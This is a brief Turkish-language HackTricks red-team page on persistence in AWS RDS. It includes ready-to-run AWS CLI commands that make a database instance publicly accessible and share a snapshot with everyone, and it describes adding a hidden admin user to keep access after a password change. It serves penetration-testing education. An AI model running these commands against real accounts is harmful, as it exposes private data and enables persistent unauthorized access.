AWS - RDS Persistence

htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

RDS

Daha fazla bilgi için kontrol edin:

AWS - Relational Database (RDS) Enum

Örnek halka açık hale getirme: rds:ModifyDBInstance

Bu izne sahip bir saldırgan, mevcut bir RDS örneğini halka açık erişime izin vermek için değiştirebilir.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Veritabanı içinde bir yönetici kullanıcısı oluşturun

Bir saldırgan, veritabanına bir kullanıcı oluşturabilir, böylece ana kullanıcının şifresi değiştirilse bile veritabanına erişimi kaybetmez.

Snapshot'ı herkese açık hale getirin

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

Last updated